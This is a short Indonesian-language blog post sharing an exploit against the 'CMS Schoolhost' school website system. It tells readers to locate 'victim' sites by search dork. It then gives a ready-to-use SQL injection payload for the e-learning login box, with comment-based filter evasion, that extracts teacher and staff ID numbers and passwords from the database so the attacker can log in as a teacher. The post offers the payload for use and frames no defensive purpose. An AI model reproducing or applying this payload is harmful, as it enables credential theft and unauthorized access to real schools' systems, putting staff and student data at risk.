Penulis Yuhhhhhuuuuu.... we back.
kali ini saya akan mengShare kembali expliot cms schoolhost, yang berbeda disni adalah bila tidak menemukan "adminpanel" pada CMS SCHOOLHOST. kita bisa menggunakan celah pada kotak login E-LEARNING dan masuk sebagai guru yang tersedia pada CMS tersebut.
" untuk yang belum tau Exploit Cms Schoolhost V1 Silakan Baca "
anggap saja sudah paham, next sepesti biasa cari website tersebut dengan dork CMS Schoolhost.
POC : ' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_guru_staff)where(0x00)in(@x:=concat+(@x,0x3c62723e,nip,0x203a3a20,password))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
ini adalah metode aternatif bila adminpanel pada victim tidak ditemukan.
sekian dan terimakasih.
EmoticonEmoticon